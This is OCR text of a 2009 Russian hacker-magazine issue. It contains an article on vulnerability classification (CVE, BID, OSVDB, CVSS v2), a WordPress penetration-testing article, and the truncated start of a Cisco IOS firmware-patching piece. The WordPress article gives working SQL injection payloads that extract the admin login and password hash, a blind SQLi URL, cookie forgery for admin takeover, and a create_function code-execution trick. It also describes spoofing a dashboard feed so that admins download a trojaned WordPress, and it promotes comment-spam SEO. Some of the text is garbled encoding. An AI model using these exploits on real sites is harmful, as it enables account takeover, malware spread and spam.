появилась идея ее создания? Многие компании 

занимаются поиском брешей в различных 

продуктах на основе политики (не)разглашения 

информации и взаимодействия с производителями. 

Как-то, при исследовании одного из 

продуктов десятью различными компаниями, 

одной и той же уязвимости были присвоены 

абсолютно разные названия. После выявления 

сей вопиющей несправедливости было принято 

соглашение о едином стандарте. Тогда же компания 

MITRE Corporation (mitre.org) предложила 

решение, независимое от различных производителей 

средств поиска уязвимостей, и взяла 

на себя ответственность за его воплощение. 

Нельзя сказать, что после этого все баги стали 

упорядоченными. Разработчики продолжают 

активно развивать самостоятельные начинания. 

Часть из них имеют платную подписку, и 

антивирусные компании частенько обращаются 

048 

XÀÊÅÐ 04 /124/ 09

взлом 

BID 

OSVDB 

Secunia 

к ним и добавляют соответствующие сигнатуры 

в свои продукты. Стоимость такой годовой подписки 

составляет около $5000 и выше. 

BID 

Эта классификация присутствует исключительно 

на портале Securityfocus (используется в 

ленте securityfocus.com/vulnerabilities). Одна 

из отличительных особенностей BID — совместимость 

с CVE. Условно говоря, найденная 

уязвимость в BID имеет ссылку на номер CVE и, 

соответственно, равнозначна по информации. 

У системы есть ряд описательных свойств — 

например, класс, возможность локального или 

удаленного исполнения и т.п. В будущем ты 

убедишься, что этих параметров недостаточно 

для полной характеристики, но, тем не менее, 

BID дает разработчику вполне наглядную 

информацию о выявленной бреши. 

OSVDB 

Название расшифровывается примерно как: 

«Открытая база данных уязвимостей». Все 

просто и со вкусом. Классификация создана 

тремя некоммерческими организациями. Двести 

волонтеров со всего мира активно участвуют в 

ее наполнении. Среди прочего присутствуют: 

локация эксплуатации (сетевой доступ/локальный 

доступ) и импакт (ущерб от уязвимости, 

воздействие на какую-либо часть целевой 

информационной системы). 

SECUNIA 

Эта датская компания, лента уязвимостей 

которой доступна по адресу secunia.com, 

уже заработала себе достаточно славы. Не 

сказать, чтобы их портал внес какую-то особую, 

добавочную классификацию, но именно он 

предлагает услуги платной подписки на базу 

уязвимостей. 

ISS X-FORCE 

ISS затрагивает все перечисленные выше критерии, 

но вдобавок описывает бизнес-импакт, 

а именно — материальный ущерб, который 

может повлечь за собой угроза эксплуатации. 

Например, баг «Microsoft Excel Remote 

Code Execution», нацеленный на компьютер 

сотрудника банка или предприятия, способен 

привести к краже важных документов, ущерб 

от разглашения которых может исчисляться 

миллионами. Оценить урон от различных 

видов атак можно, ознакомившись с одним 

из ведущих блогов в русскоязычном сегменте 

о security-бричах и утечках — Perimetrix 

(securitylab.ru/blog/company/Perimetrix_blog). 

Также в системе присутствует качественно 

новая черта — переход к метрикам безопасности 

для описания свойств уязвимости. Для 

этого используется общая система подсчета 

рисков уязвимостей CVSS версии 2. Она 

представляет собой шкалы, на основе которых 

выставляются баллы. Система метрик была 

придумана для разделения приоритетов над 

исправлением уязвимостей. Каждая шкала 

относится к определенному смысловому разделу, 

который называется метрикой. В CVSS v.2 

их три: базовая метрика, временная метрика 

и контекстная метрика. Хакеров заинтересует 

только первая. 

БАЗОВАЯ МЕТРИКА 

Нередко на солидных порталах по безопасности 

можно увидеть фразу — «CVSS Base Score = 

9.2». Как это понимать? Параметр вычисляется 

по специальной формуле: 

BaseScore = round_to_1_decimal((( 

0.6*Impact)+(0.4*Exploitability)- 

1.5)*f(Impact)) 

— плюс еще несколько. Все эти формулы можно 

найти по адресу first.org/cvss. Чтобы все стало 

понятнее, рассмотрим пример. Задан вектор 

уязвимости базовой метрики вида: «AV:N/ 

AC:L/Au:N/C:N/I:N/A:C». Все красуется на 

странице описания, но ты абсолютно не можешь 

расшифровать эти иероглифы! Я тебе 

помогу. Итак, расшифровываем по порядку. 

Access Vector: Network — возможность доступа 

к объекту исключительно через сеть. Для эксплуатации 

уязвимости злоумышленник должен 

обладать доступом к уязвимому ПО, причем этот 

доступ ограничен только величиной сетевого 

стека. Локального доступа или доступа из 

Политика разглашения 

информации об уязвимости 

Недокументированные 

уязвимости 

В настоящее время эксперты мозгуют над включением вектора 

«недокументированные уязвимости» в одну из метрик. Этот параметр 

имеет высокое значение. В недалеком будущем мы сможем 

лицезреть строку undercover vulnerabilities — «вероятно, возможные 

к исполнению». На сайте, посвященном развитию метрик 

информационной безопасности (securitymetrics.org/content/Wiki. 

jsp), вывешено публичное обращение по поводу того, как и каким 

образом исчислять этот параметр. Все желающие могут отправить 

туда свои предложения. 

Это соглашение имеет ряд нюансов. Например, хакер, обнаружив 

уязвимость, ищет контакты, чтобы направить соответствующий 

запрос производителю. Если по истечении пяти дней производитель 

отмалчивается, вводит в заблуждение своих пользователей какимито 

способами или некорректно вступает в диалог, то ему отправляется 

повторное письмо. Выжидаются еще пять рабочих дней, после чего 

баг-хантер вправе помещать описание о баге на собственном ресурсе 

или в публичные багтраки. При этом в письме требуется оговорить и 

согласовать дату публикации, чтобы производитель успел выпустить 

обновление или советы по защите от эксплуатации. Важно отметить, 

что если стороннее третье лицо опубликовало данные об эксплуатации 

найденной тобой уязвимости, ты можешь смело постить ее 

подробности без согласования с кем-либо. Вот такая арифметика. 

XÀÊÅÐ 04 /124/ 09 

049

взлом 

Secunia 

Подсчитанное значение Base Score для уязвимости в Microsoft Windows 

Kernel GDI 

Все самое интересное и вкусное распространяется только платно 

Существует очень много видов систем и баз для учета уязвимостей. Многие 

из них совместимы с CVE 

BID указывает лишь несколько характеристик о свойствах уязвимости 

info 

Истинные корни 

создания единой 

классификации 

багов и их контроля 

— это Unix 

Known Problem 

List, Internal Sun 

Microsystems Bug 

List, каталоги служб 

реагирования на 

компьютерные 

инциденты CERT 

ранних версий. 

050 

соседней сети не требуется. Такие уязвимости часто называют 

эксплуатируемыми удаленно. Примером такой сетевой атаки 

служит переполнение буфера RPC. 

Access Complexity: Low — сложность доступа к ресурсу: 

низкая. Для эксплуатации специальных условий и особых 

обстоятельств не требуется — все стандартно, шаблонно, 

общедоступно. 

Authentication: None — для эксплуатации не нужна авторизация. 

Например, если бы это был сервис, который требует 

предварительной авторизации по какой-нибудь мудреной 

схеме (смарт-карты, ключи, токены), то значение этого 

вектора было бы другим. 

Confidentiality Impact: None — влияние на разглашение 

критичной информации. Integrity Impact: None — нарушение 

целостности. Понятие «целостность» связано 

с достоверностью и точностью информации. Если бы у 

злоумышленника была возможность модификации файлов, 

изменения области исполнения файлов, то мы бы поставили 

здесь C (полное) или P (частичное, от «partial»). 

Availability Impact: Complete — атаки, потребляющие пропускную 

способность сети, циклы процессора или дисковое 

пространство, которые влияют на доступность системы. 

Если эксплуатация уязвимости вызывает отказ в обслуживании, 

то Availability Impact имеет значение «Complete». 

ВРЕМЕННАЯ МЕТРИКА 

Более глубоким анализом занимаются временные и 

контекстные метрики. Дело в том, что описанные векторы 

базовой метрики со временем не меняются. Они постоянны 

и могут характеризовать уязвимость по назначению и 

опасности. А какие критерии могут изменяться с течением 

времени? Представь, что ты нашел критическую уязвимость 

и уведомил разработчика. Временной интервал исправления 

уязвимости в таком случае имеет значение, да и к 

тому же, сам изменяется во времени (это может быть день, 

час, либо производитель вообще никак не отреагирует). 

Или ситуация, когда твой друг написал боевой эксплойт на 

недавнюю уязвимость «нулевого дня». Как долго этот код 

будет актуален? Он ускорит риск эксплуатации, следовательно, 

должен учитываться при ее описании. Доступна ли 

будет его технология к завтрашнему дню? На все эти вопросы 

отвечают временные метрики. Рассмотрим некоторые их 

векторы. 

Exploitability (E) — возможность эксплуатации. Пожалуй, 

один из важнейших критериев. Речь идет конкретно о 

доступности средства (кода, эксплойта, технологии), которое 

успешно работает. Важно учитывать и то, что доступный 

эксплойт можно использовать далеко не всегда. Используемые 

описательные флаги: U (недоступен или непроверен), 

Proof-of-Concept (POC — опубликована наглядная 

демонстрация уязвимости), F (функциональный, и рабочий 

эксплойт у тебя в руках), H («high risk» всей темы, чаще 

всего характерен для червей или для уязвимостей с широко 

популярным описанием), ND (без разницы, вектор метрики 

не влияет ни на что существенное, поэтому учитывать его 

не надо). Remediation Level (RL) — уровень исправления. 

Голос уязвимости услышал весь свет, вот только как поступят 

разработчики? Порой они просто молчат, потому что их уже 

не осталось в живых (простите, за цинизм и черный юмор), а 

иногда абсолютно сторонние организации и неофициальные 

источники начинают заботиться о безопасности на первый 

взгляд чужих продуктов и оперативно писать заплатки. 

Report Confidence (RC) — степень достоверности отчета. 

Сколько слухов и разговоров крутится вокруг! Банальный 

XÀÊÅÐ 04 /124/ 09

взлом 

BID 

OSVDB 

Secunia 

Вывод характеристик с сайта osvdb.org. Не всегда авторам известно о 

наличии боевого кода в природе, что затемняет подробности уязвимости 

На официальном сайте Национальной базы данных уязвимостей 

есть возможность поиска по критериям CVSS 

Если ты заметил, мы обращались к новой редакции CVSS (2). Существует 

еще и первая, облегченная версия, не учитывающая многих параметров. 

Тем не менее, она пригодна к использованию и намного проще. Посчитать 

Base Score для нее можно с помощью сервиса на офсайте NVD 

пример: человек написал информацию якобы 

о рабочей критической уязвимости. А на деле 

оказалось, что это программный дефект и 

ничего существенного собой не представляет. 

Подтверждена ли уязвимость экспертами или 

же это просто проделки хакерских слухов? Ответ 

на этот вопрос даст вектор Report Confidence. 

Параметры всех указанных векторов градируются 

вариантами «да/нет/возможно». 

КОНТЕКСТНАЯ МЕТРИКА 

Эти группы векторов отражают влияние на 

среду пользователя и изучают поведение 

после эксплуатации уязвимости. Как правило, 

метрика используется в качестве дополнения 

к базовой. Collateral Damage Potential (CDP) 

— вероятность нанесения косвенного ущерба. 

Описывает экономические или технические потери. 

Скажем, нам встретится уязвимость, приводящая 

к DoS-атаке. После ее эксплуатации 

часть сетевого оборудования перегревается, 

не справляясь с работой, и выходит из строя. Но 

при этом ущерб оказывается незначительным 

из-за низкой стоимости устройства и его расположения 

(вне защищаемых и важных объектов). 

Target Distribution (TD) — плотность целей. 

Влияет ли уязвимость только на одну цель, либо 

с ее помощью можно поработить огромное 

число машин? Если это стендовое показательное 

выступление, лабораторный практикум или 

эксплуатация на машине, изолированной от 

других, то значение этого вектора равно нулю. 

ИСПОЛЬЗОВАНИЕ 

КЛАССИФИКАТОРОВ В СКАНЕРАХ 

Современные автоматизированные аудиторы 

принято затачивать под какую-либо конкретную 

базу знаний. Во-первых, это престижно, во-вторых 

— полезно. К примеру, при подготовке к аттестации 

по одному из современных стандартов (NERC-CIP, 

PCI, FISMA, GLBA или HIPAA) администратору предоставляется 

возможность получить шаблонный 

отчет, соответствующий документу, издаваемому 

аудитором. Я встречал такое в современных сканерах 

беспроводной безопасности, типа AirMagnet, 

а также дорогих коммерческих сканерах вроде ISS 

Security Scanner. Порой сканеры безопасности 

прибегают к использованию собственного разделения 

брешей по ID. Подобная практика применяется 

в Nessus, который таки сменил лицензию на 

полукоммерческую. 

ОТДЕЛЬНЫЕ КЛАССИФИКАЦИИ 

Подчас в Сети можно заметить абсолютно 

самопальные классификации, вроде Common 

Criteria Web Application Security Scoring 

(CCWAPSS) 1.1. Естественно, большого веса 

такая система не имеет, потому что составляться 

она должна реальными экспертами, которые 

понимают суть проблемы. 

CVE: ISS, BID, Secunia, SecurityTracker, OSVDB 

BID: CVE, Bugtraq, ISS, Secunia, SecurityTracker, OSVDB 

ISS: CVE, BID, Secunia, SecurityTracker, OSVDB 

Secunia: CVE, OSVDB 

SecurityTracker: CVE, OSVDB, Nessus 

Nessus: CVE, BID, OSVDB 

OSVDB: CVE, BID, Secunia, SecurityTracker, ISS, Nessus, Snort 

XÀÊÅÐ 04 /124/ 09 

Список «междоусобной» совместимости 

систем классификаций 

ТАК ЛИ ОНО ВСЕ ВАЖНО? 

Безусловно, к делу следует подходить без фанатизма. 

В первую очередь, подобные системы 

классификации нацелены на экспертное звено 

либо специалистов, которые заботятся о своевременном 

устранении брешей. Но, на мой 

взгляд, каждый уважающий себя хакер должен 

знать и понимать общепринятые классификации 

уязвимостей, разбираться в метриках и 

их векторах, чтобы четко и ясно представлять 

формулу оценки всех недавно взломанных им 

ресурсов. z 

051

взлом 

АНДРЕЙ «SKVZ» КОМАРОВ 


WordPress: 

ТЕСТ 

НА ПРОНИКНОВЕНИЕ 

ПОЛНЫЙ АНАЛИЗ МАЛОИЗВЕСТНЫХ УЯЗВИМОСТЕЙ РАСКРУЧЕННОГО ДВИЖКА 

WorldPress— áåç ïðåóâåëè÷åíèÿ, ñàìûé ïîïóëÿðíûé äâèæîê âî âñåõ «èíòåðíåòàõ» 

(ïî çàïðîñó «Powered by WordPress» Ãóãë âûäàåò 74 400 000 

ðåçóëüòàòîâ!). Äâèæîê ïèñàëñÿ ñ ðàñ÷åòîì íà òî, ÷òîáû ëþáàÿ «äîìîõîçÿéêà» 

ñìîãëà èì âîñïîëüçîâàòüñÿ. Òàê è ïîëó÷èëîñü: çíàìåíèòàÿ «5-ìèíóòíàÿ 

óñòàíîâêà», ñðåäñòâà çàùèòû îò ñïàìà, âèçóàëüíûé ðåäàêòîð, seo-friendly 

ññûëêè è ìíîãèå äðóãèå ôè÷è ñäåëàëè ñâîå äåëî. Íî âñå ëè â ïîðÿäêå ó ýòîãî 

âåëèêîëåïèÿ ñ ýëåìåíòàðíîé áåçîïàñíîñòüþ? 

>> взлом 

В предыдущих номерах ][ я уже не раз поднимал тему безопасности 

WordPress. Вкратце вернемся к пройденному и систематизируем твои 

знания. 

Итак, последняя мало-мальски серьезная SQL-инъекция была найдена 

в 2.2.2 версии движка 28 июля уже далекого 2007 года неким Alexander 

Concha (не повезло человеку с фамилией). Не будем подробно на ней 

останавливаться, но если ты интересуешься историей, смотри ссылку на 

advisory в сносках. 

Идем далее. Во всех версиях движка, до 2.3.3 версии включительно, 

присутствует XSS-уязвимость в модуле фильтрации html kses (вспомнить 

о ней тебе поможет, например, январский номер журнала). Уязвимость 

можно было бы считать достаточно серьезной, если бы не одно 

но: админу надо нажать на ссылку с очень подозрительным адресом, что 

произойдет, только если админ — полный «чайник». 

Стоит упомянуть о нашумевшей в свое время уязвимости «Charset 

Remote SQL Injection» (версии

взлом 

WORDPRESS COMMENTS HTML SPAM VULNERABILITY 

Перед тобой первая неопубликованная уязвимость, которую я назвал 

«WordPress Comments Html Spam Vulnerability». 

Уязвимость затрагивает все версии движка, начиная от 1.5 и заканчивая 

последней (на момент написания статьи) 2.7.1. 

Заглянем в исходники вордпресса. Открывай файл ./wp-includes/ 

comment.php и находи следующий код: 

function check_comment($author, $email, $url, $comment, 

$user_ip, $user_agent, $comment_type) { 

... 

if ( 'trackback' == $comment_type || 'pingback' == 

$comment_type ) { // check if domain is in blogroll 

$uri = parse_url($url); 

$domain = $uri['host']; 

$uri = parse_url( get_option('home') ); 

$home_domain = $uri['host']; 

if ( $wpdb->get_var($wpdb->prepare("SELECT 

link_id FROM $wpdb->links WHERE link_url LIKE (%s) LIMIT 

1", '%'.$domain.'%')) || $domain == $home_domain ) 

return true; 

else 

return false; 

} 

... 

} 

} 

$str = mb_strcut( $str, 0, $count ); 

// remove part of an entity at the end 

$str = preg_replace( '/&[^;\s]{0,6}$/’, '', $str ); 

return $str; 

Казалось бы, передать ссылку здесь невозможно. Но нерадивые разработчики 

снова не учли несколько нюансов: 

1. strip_tags() успешно пропускает через себя теги вроде «» (то есть, 

содержащие пробелы); 

2. kses-фильтры успешно нормализуют html-теги, содержащие в себе 

эти самые пробелы. 

Исходя из этой информации, можно придумать конечный эксплойт: 

 

 

Òàéòë: 

URL: 

Comment: 

Êóïèòü ñëîíà< / a > 

В итоге, на нужном блоге мы получим зааппрувленный комментарий с 

выделенной жирной ссылкой «Купить слона». Единственное замечание: 

этот способ в SEO годен только для Yahoo, Яндекса, MSN, так как в коде 

ссылки добавляется rel=«nofollow», благодаря чему всемогущий Гугл ее 

не засчитывает. 

ПОДМЕНА RSS-ФИДОВ В DASHBOARD 

В конце прошлого года я нашел еще один занимательный баг в 

WordPress, который заключался в подмене RSS-лент на главной странице 

админки блога. Итак, в Dashboard содержатся следующие ленты новостей: 

новости плагинов, incoming links, новости devblog c wordpress. 

org и новости «Планеты WordPress». Начиная с версии 2.5, к каждому 

фиду прикреплена кнопочка «Edit», что позволяет администратору блога 

редактировать эти пресловутые фиды, заменяя их на любые свои. Но 

разработчики снова проморгали тот факт, что в функции редактирования 

фидов не существует никакой проверки прав (в который раз поражаюсь 

невнимательности девелоперов). Теперь смотри. Скопируй ленту 

новостей с девблога официального сайта вордпресса, затем вставь в 

нее в качестве первого поста объявление о security-патче (или просто 

новой версии) блога. В посте (естественно, в ссылке на скачку) укажи 

свой протрояненный дистрибутив вордпресса. Затем положи подготовленный 

фид на какой-нибудь сервер и используй этот html-код для 

подмены рсс-ленты девблога на свою: 

 

 

взлом 

Редактирование кукисов в Opera 

Генерация таблиц для admin takeover от Электа 

links 

• wordpress.org/ 

download/releasearchive/ 

— архив 

релизов WordPress. 

• milw0rm.com/ 

exploits/4721 — 

Charset Remote 

SQL Injection 

Vulnerability. 

• buayacorp.com/ 

files/wordpress/ 

wordpress-sqlinjection-advisory. 

html — Remote 

SQL Injection in 

WordPress and 

WordPress MU. 

• securityfocus. 

com/bid/27669 

— WordPress 

'xmlrpc.php' Post 

Edit Unauthorized 

Access Vulnerability. 

• securityfocus. 

com/bid/28845 

— WordPress 

'cat' Parameter 

Directory Traversal 

Vulnerability. 

Эксплойт для баги с create_function 

value="Çàãîëîâîê ðññ" /> 

 

 

query("UPDATE $wpdb->posts 

SET pinged = '$new' WHERE ID = $post_id"); 

} 

Небольшие раскопки дают понять, что фильтра «add_ping» 

не существует в коде движка. 

Получается, что данные из первого запроса подставляются 

во второй запрос без какой-либо фильтрации! А теперь 

о способе эксплуатации данной уязвимости. Запасись 

терпением :). Чтобы использовать баг, тебе необходимо две 

инсталляции вордпресса: 

1. Все равно какой версии. Создай новый пост с любым тайтлом 

и содержимым: 

pingme 

Запомни адрес созданного поста (например, http://lamer/ 

wp1/?p=2). 

2.Во втором блоге ветки 2.3.x-2.5.1 создай пост с любым содержанием 

и любым тайтлом, а в поле «Send trackbacks to:» пиши: 

test',post_title=(select/**/concat(user_ 

login,':',user_pass)/**/from/**/wp_users/**/ 

where/**/id=1),post_content_filtered =’blah 

054 

function add_ping($post_id, $uri) { 

// Add a URL to those already pung 

global $wpdb; 

$pung = $wpdb->get_var("SELECT pinged FROM 

Сохраняй пост. 

Снова заходи в его редактирование, но теперь редактируй 

само содержимое и вставля й туда ссылку в html-формате на 

пост из первого блога: 

XÀÊÅÐ 04 /124/ 09

взлом 

Parse_str sql-инъекция 

Эксплойты WordPress 

Здесь мы наблюдаем ту же ситуацию: переменная $to_ping подставляется 

в следующий запрос без какой-либо фильтрации. 

Использовать эту SQL-инъекцию очень просто. 

1. Создавай новый пост и в «Send trackbacks to:» вставляй следующее: 

pingme 

test','')),post_title=(select/**/concat(user_ 

login,':',user_pass)/**/from/**/wp_users/**/where/**/ 

id=1),post_content_filtered=TRIM(REPLACE(to_ping,'blah 

Готово! Сохраняйся, переходи на страницу нашего поста и наслаждайся 

НЕ МОГУ НЕ ПОДЕЛИТЬСЯ С 

ТОБОЙ ЕЩЕ ОДНОЙ ЗАБАВ- 

НОЙ SQL-ИНЪЕКЦИЕЙ, КОТО- 

РАЯ ПРИСУТСТВУЕТ ВО ВСЕХ 

ВЕРСИЯХ ДВИЖКА, НАЧИНАЯ 

С 2.3.X И ЗАКАНЧИВАЯ ПОС- 

ЛЕДНЕЙ НА ДАННЫЙ МОМЕНТ 

2.7.1. 

результатами выполнения скули в виде хеша и пароля админа. 

ЭТИ ЗАБАВНЫЕ ПИНГИ. ЧАСТЬ 2 

Вторая SQL-инъекция присутствует в механизме трэкбэков и выглядит уже не 

так ужасно. Открывай файл ./wp-includes/comment.php и находи в нем код: 

function do_trackbacks($post_id) { 

... 

$to_ping = get_to_ping($post_id); 

... 

if ( $to_ping ) { 

foreach ( (array) $to_ping as $tb_ping ) { 

$tb_ping = trim($tb_ping); 

if ( !in_array($tb_ping, $pinged) ) { 

trackback($tb_ping, $post_title, 

$excerpt, $post_id); $pinged[] = $tb_ping; 

} else { 

$wpdb->query(«UPDATE $wpdb->posts SET to_ 

ping = TRIM(REPLACE(to_ping, '$tb_ping', '')) WHERE ID = 

'$post_id'"); 

} 

} 

} 

} 

XÀÊÅÐ 04 /124/ 09 

2. Сохраняй пост, заходи в редактирование вновь созданного поста и 

опять вставляй туда тот же самый код; 

3. Сохраняйся и наблюдай в тайтле поста логин и пароль админа. 

КОВАРНЫЙ PARSE_STR 

Не могу не поделиться с тобой еще одной забавной SQL-инъекцией, 

которая присутствует во всех версиях движка, начиная с 2.3.x и 

заканчивая последней на данный момент 2.7.1. Для использования 

инъекции необходимы права «manage_links». Для теста снова возьмем 

WordPress 2.3.3. Итак, открывай ./wp-admin/link-manager.php. 

В этом файле присутствует следующий код: 

get_bookmarks( "category=$cat_id&hide_invisible=0&orde 

rby=$sqlorderby&hide_empty=0" ); 

Начиная от этого кода, попробуем провести небольшой реверсинг: 

./wp-includes/bookmark.php 

function get_bookmarks($args = '') { 

... 

$r = wp_parse_args( $args, $defaults ); 

extract( $r, EXTR_SKIP ); 

... 

if ( ! empty($category_name) ) { 

if ( $category = get_term_by('name', 

$category_name, 'link_category') ) 

$category = $category->term_id; 

} 

... 

./wp-includes/formatting.php 

function wp_parse_args( $args, $defaults = '' ) { 

if ( is_object($args) ) 

$r = get_object_vars($args); 

else if ( is_array( $args ) ) 

$r =& $args; 

else 

wp_parse_str( $args, $r ); 

} 

if ( is_array( $defaults ) ) 

return array_merge( $defaults, $r ); 

else 

return $r; 

055

взлом 

Pingback sql-инъекция 

Magic SEO Toolz — мой сборник эксплойтов для WordPress 

WORDPRESS 2.5 COOKIE INTEGRITY 

PROTECTION VULNERABILITY 

Еще одна интереснейшая логическая уязвимость, которой уделили 

недостаточно внимания, — это «Cookie Integrity Protection 

Vulnerability». Ей подвержен WordPress 2.5. В официальном advisory 

насчет реальной эксплуатации баги сказано мало и не совсем понятно, 

— так что многие до сих пор у меня интересуются, как ее использовать. 

Суть баги достаточно проста: начиная с версии 2.5, в WordPress 

появилась новая система авторизации и хранения паролей, которую 

до конца еще не успели отладить. Для авторизации на блоге используется 

следующая схема формирования кукисов: 

function wp_parse_str( $string, &$array ) { 

} 

parse_str( $string, $array ); 

if ( get_magic_quotes_gpc() ) 

$array = stripslashes_deep( $array ); 

$array = apply_filters( 'wp_parse_str', $array ); 

./wp-includes/taxonomy.php 

function get_term_by($field, $value, $taxonomy, $output 

= OBJECT, $filter = 'raw') { 

... 

} else if ( 'name' == $field ) { 

// Assume already escaped 

$field = 't.name'; 

... 

$term = $wpdb->get_row("SELECT t.*, tt.* FROM 

$wpdb->terms AS t INNER JOIN $wpdb->term_taxonomy 

AS tt ON t.term_id = tt.term_id WHERE tt.taxonomy = 

'$taxonomy' AND $field = '$value' LIMIT 1"); 

На этот раз разработчики WordPress не учли, что: 

1. Функция parse_str проводит свои параметры через urldecode, а значит, 

какая-либо фильтрация идет лесом (плюс wp_parse_str дополнительно 

проводит наши данные через stripslashes); 

2. В get_bookmarks() мы сможем передать дополнительные параметры 

для parse_str с помощью амперсанда (%26 в urlencode). 

Отсюда, как логичный вывод, следует blind sql-инъекция: 

http://lamer.com/wp233/wp-admin/link-manager.php?cat_ 

id=all%26category_name=0%2527+union+select+1,2,3,4,5, 

6,7,8,9,10+from+wp_users+where+1=1/*&order_by=order_ 

url&action=Update+%C2%BB 

"wordpress_".COOKIEHASH = USERNAME . "|" . EXPIRY_TIME . 

"|" . MAC 

Расшифровка этих непонятных символов элементарна: 

COOKIEHASH — md5-хеш URL’а сайта, где установлен движок; 

USERNAME — логин авторизуемого юзера; 

EXPIRY_TIME — время истечения жизни кукисов; 

MAC — злостное сочетание из HMAC-кода, полученного на основе имени 

юзера и времени жизни кукисов, а также секретных ключей из конфига и 

БД. Если ты еще не понял, то скажу тебе, что проблема заключается как 

раз в способе конкатенации этих значений. 

А теперь внимание, — способ эксплуатации уязвимости: 

1. Регистрируй юзера с именем «admin99»; 

2. Авторизуйся на блоге; 

3. Отредактируй свои кукисы (в Опере: Инструменты Дополнительно 

Редактирование cookies) следующим образом: 

Áûëî: 

wordpress_[ÕÅØ] = admin99|âðåìÿ|MAC 

Ñòàëî: 

wordpress_[ÕÅØ] = admin|99âðåìÿ|MAC 

В итоге, с новыми кукисами ты благополучно авторизуешься с правами 

админа. 

WORDPRESS 2.7.X ADMIN REMOTE CODE EXECUTION EXPLOIT 

Выполнение произвольного кода в админке через create_function (баг 

нашел некий Ryat[puretot]) — еще одна интересная уязвимость, почему-то 

оставшаяся не только без внимания хакеров, но и без внимания 

разработчиков! 

Эксплойт к ней появился еще в версии 2.7, но в последнем вордпрессе 

(сейчас — 2.7.1) дыра по-прежнему не закрыта. 

Проведем небольшой аудит кода ./wp-admin/post.php: 

Условия здесь такие: 

а) 1=1 — ничего не отображается; 

б) 1=2 — отображается список ссылок блога. 

056 

if ( current_user_can('edit_post', $post_ID) ) { 

if ( $last = wp_check_post_lock( $post->ID ) ) { 

$last_user = get_userdata( $last ); 

XÀÊÅÐ 04 /124/ 09

взлом 

Редактирование RSS-фида в WordPress 2.5-2.6.5 

Уязвимости WordPress 

Работа одного из приватных эксплойтов для 2.x ветки 

$last_user_name = $last_user ? $last_user- 

>display_name : __('Somebody'); 

$message = sprintf( __( 'Warning: %s is currently 

editing this post' ), wp_specialchars( $last_user_name ) ); 

$message = str_replace( "'", "\'", "$message" ); 

add_action('admin_notices', create_function( 

'', "echo '$message';" ) ); 

} 

} 

else { wp_set_post_lock( $post->ID ); 

wp_enqueue_script('autosave'); 

} 

Из анализа этого кода видно, что юзер с правами «edit_post» может 

провести инъекцию произвольного кода следующим образом: 

1. Сменить значение «display_name» на что-то вроде \’;phpinfo();\’. В 

результате переменная $message будет выглядеть так: 

Warning: \';phpinfo();\' is currently editing this post 

2. Когда $message пройдет stripslashes и попадет в create_function(), 

создастся функция с таким вот интересным телом: 

{ 

echo '';phpinfo();''; 

} 

Как видишь, налицо банальный code exec. Ссылку на эксплойт ищи в 

сносках. Добавлю, что эксплойт предназначен для юзера с правами 

admin, но, немного подумав, ты сможешь исправить его для работы с 

правами author/editor. 

ИТОГИ 

Жесткие рамки статьи не позволяют рассказать обо всех найденных 

мной и другими людьми уязвимостях WordPress, но я этого и не хочу 

:). Описанные тут уязвимости — лишь верхушка айсберга. Существуют 

гораздо более серьезные и полезные баги во всех, даже самых 

последних, версиях движка. Эти баги не только стоят множество зеленых 

президентов, но и позволяют безбедно жить на поприще SEO. 

Поэтому могу лишь пожелать разработчикам вордпресса оставаться 

такими, какие они есть: невнимательными и забавными в своей 

простоте.z 

XÀÊÅÐ 04 /124/ 09 

057

взлом 

ЕВГЕНИЙ «SHADOS» ХАБАРОВ 

/ SHADOS@MAIL.RU/ 

ИМПЛАНТАЦИЯ 

CISCO 

МОДИФИЦИРОВАНИЕ ПРОШИВКИ МАРШРУТИЗАТОРА 

Ïðèâåòñòâóþ, äîðîãîé äðóã! Ñåãîäíÿ ìû áóäåì äàðèòü âòîðóþ ìîëîäîñòü 

(à ìîæåò äàæå è æèçíü) ñòàðûì ìàðøðóòèçàòîðàì Cisco, ïðàêòè÷åñêè íå íàðóøàÿ 

ëèöåíçèîííîãî ñîãëàøåíèÿ. Ïóñòü ýòîò õàêåðñêèé ìåòîä äîñòàòî÷íî 

ïðîñò, íî îò ýòîãî îí íå ñòàíîâèòñÿ ìåíåå èíòåðåñíûì. Èìÿ åìó — «áèíàðíûé 

ïàò÷èíã». 

>> взлом 

Сразу к делу. Исходные данные следующие: 

старенькая кошка Cisco 2611 с двумя 

Ethernet-портами, 64 Мб RAM и 16 Мб на 

Flash. Это максимально возможные параметры, 

поддерживаемые платформой (читай 

— увеличить объем DRAM памяти и flash 

не получится из-за отсутствия в природе 

комплектующих больших объемов). Исходя 

из данных Cisco IOS Feature Navigator (tools. 

cisco.com/ITDIT/CFN/jsp/index.jsp), последней 

версией IOS для этого маршрутизатора 

является 12.3(26) — вполне естественно для 

столь старого продукта (End-of-Sale — апрель 

2003, End-of-Life — апрель 2008). Хочется 

получить только все самое последнее и новое, 

а все самое новое и вкусное доступно только в 

версии 12.4 (точнее 12.4T). Посыл номер два, 

или дополнительные исходные данные таковы: 

если внимательно следить за модельным 

рядом маршрутизаторов Cisco или просто 

ознакомиться с информацией о продуктах на 

официальном сайте, то можно обнаружить, 

что серия 2600 включает в себя, например, 

маршрутизаторы 2611XM. Отличается эта 

серия от своего предшественника незначительно: 

• Ìàêñèìàëüíûé îáúåì flash-ïàìÿòè 

óâåëè÷åí äî 48 MB (â 2611 — 16 MB) 

• Ìàêñèìàëüíûé îáúåì SDRAM-ïàìÿòè 

óâåëè÷åí äî 128 MB (â 2611 — 64 MB) 

• Èíòåãðèðîâàííûå 10/100 Fast 

Ethernet ïîðòû (â 2611 — 10 Ìáèò/c 

Ethernet) 

Для такой кошки Cisco IOS Feature Navigator 

сообщит, что последний IOS имеет версию 

12.4(23). Системные требования для IOS 12.4(21) 

с набором Enterprise Base или Advanced 

Security составляют 128 MB DRAM и 32 MB 

flash. Конечно, у нас нет 128 MB памяти, но 

попытка не пытка, да и пропускная способность 

портов у нас невысокая. Это позволяет сделать 

предположение, что ОС можно запустить на 

моем устройстве. Осталось превратить теорию 

в практику. 

EXTENDED, ИЛИ ЧТО ХОТИМ ПОЛУЧИТЬ 

Идея проста — загнать бинарный образ 

операционной системы Cisco IOS 12.4(21) 

с набором фьючерсов Enterprise Base на 

старенький маршрутизатор 2611 с исходными 

данными, представленными выше. 

В дальнейшем — использовать как тестовый 

стенд, ибо 10-мегабитные интерфейсы ограничивают 

его применение в дикой природе, 

или, как говорится, in production. С тем же 

успехом устройство может надежно служить 

файрволом корпоративной сети взамен 

какого-нибудь PIX (если, конечно, достаточно 

пропускной способности в 10 Мбит), но тогда 

встает вопрос — а есть ли такой функционал, 

